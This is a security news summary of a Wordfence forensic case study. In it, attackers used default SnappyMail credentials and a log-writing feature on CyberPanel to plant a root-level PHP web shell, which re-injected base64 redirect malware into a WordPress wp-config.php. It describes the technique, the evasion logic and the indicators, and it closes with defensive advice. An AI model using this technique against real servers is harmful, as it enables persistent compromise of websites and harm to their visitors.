How a Webmail Log File Became a Root-Level Backdoor
Wordfence details a CyberPanel attack chain where SnappyMail logs were abused as a root-level backdoor to repeatedly inject redirect malware into WordPress sites.
Wordfence has published a forensic case study detailing how attackers turned CyberPanel's SnappyMail webmail logging into a persistent root-level backdoor, enabling repeated injection of redirect malware into a WordPress site's wp-config.php file. The attack chain, which survived every standard WordPress cleanup attempt, leveraged server-level persistence completely invisible to WordPress security tools.
The malware consisted of a single line of double-encoded base64 injected at the top of wp-config.php. The decoded payload surgically evaded detection by only executing on frontend page loads, excluding the WordPress admin panel, REST API, AJAX requests, login page, and any XHR requests. This meant site owners could browse their admin panel without seeing the malware, while visitors experienced redirect popups and Yandex Metrica tracking.
The malicious domain async.gsyndication.com is a typosquat of Google's legitimate googlesyndication.com, registered on October 15, 2024, and linked to 29+ other malicious domains in similar redirect campaigns. VirusTotal flagged it as malicious with a reputation score of -1.
A comprehensive WordPress-level forensic audit by Wordfence found no rogue files, no database injections, no compromised admin accounts, and no malicious cron jobs. However, during the audit, the site owner reported the site was acting up again, and the base64 payload had reappeared in wp-config.php on the live production server.
With WordPress ruled out, investigators searched the entire filesystem for the payload string and found it in /usr/local/CyberCP/public/snappymail/data/_data_/_default_/logs/shell.php — a 1.2MB PHP file in the SnappyMail webmail logs directory, well outside the WordPress webroot.
Reading the log file revealed the entire compromise took 14 seconds. The attacker logged into the SnappyMail admin panel using default credentials, then exploited a feature that writes PHP code to log files. By sending a crafted email containing PHP code, the attacker caused SnappyMail to write that code to a log file named shell.php, which could then be accessed via the web to execute commands as the root user.
Wordfence recommends that CyberPanel users change default SnappyMail admin credentials, disable logging if not needed, restrict access to SnappyMail's admin panel, and monitor for suspicious log files. The case underscores the importance of server-level security monitoring beyond WordPress-focused tools.